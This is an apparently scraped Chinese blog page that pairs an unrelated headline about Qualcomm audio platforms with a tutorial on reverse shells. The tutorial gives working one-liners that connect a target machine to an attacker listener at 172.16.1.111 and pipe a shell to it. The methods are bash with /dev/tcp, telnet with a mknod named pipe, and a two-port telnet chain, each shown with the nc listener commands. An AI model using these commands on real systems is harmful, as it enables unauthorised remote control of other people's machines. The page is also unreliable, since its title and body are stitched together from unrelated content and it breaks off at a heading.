1. 程式人生 > 資訊 >高通釋出兩款全新音訊平臺,支援驍龍暢聽技術

高通釋出兩款全新音訊平臺,支援驍龍暢聽技術

在Netcat的學習中我們學習瞭如何使用nc -e /bin/bash反彈shell
這裡分享一些除了nc以外其他的反彈方式

Bash反彈shell

bash -i >& /dev/tcp/IP地址/埠 0>&1

/dev/tcp,udp,host,port等是一些特殊的裝置,可以進行讀取和寫入建立socket連線
0>&1 ,將標準輸入顯示到標準輸出

bash -i >& /dev/tcp/IP地址/埠這一段是將我們 bash 執行的命令輸出到 /dev/tcp/目標地址/目標埠中 ,可以這樣簡單的理解
攻擊機:nc -lvp 866

靶機:bash -i >& /dev/tcp/172.16.1.111/866 0>&1



執行後靶機將會無法執行命令

反彈成功

telnet反彈shell

mknod 裝置名 p && telnet targetIp 8080 0<裝置名 | /bin/bash 1>裝置名

利用telnet建立連線|交給bash處理執行系統命令,0<裝置名將我們輸入傳入,1>裝置名將我們輸入傳輸
攻擊機:nc -lvp 866

靶機:mknod test p && telnet 172.16.1.111 866 0<test | /bin/bash 1>test

執行後回到攻擊機

另一種 telnet 反彈

我們在攻擊機監聽1234埠,靶機執行命令telnet 172.16.1.111 1234| /bin/bash



可以看到,我們好像是共享了bash,攻擊機執行命令試一下

並沒有任何回顯,回到靶機

發現我們執行的命令在靶機中執行了,哈哈哈
猜想,我們再次| telnet 172.16.1.111 8888連線攻擊機的另一個埠,交個這個埠處理,會不會就顯示過去了?
實驗:攻擊機建立連個命令列,分別監聽1111和2222埠
nc -lvp 1111nc -lvp 2222


在靶機執行我們猜想的命令

telnet 172.16.1.111 1111 | /bin/bash | telnet 172.16.1.111 2222


執行成功,回到攻擊機我們在1111埠執行命令,在2222埠檢視結果


成功反彈shell,哈哈哈,還有這種怪異的方法

php反彈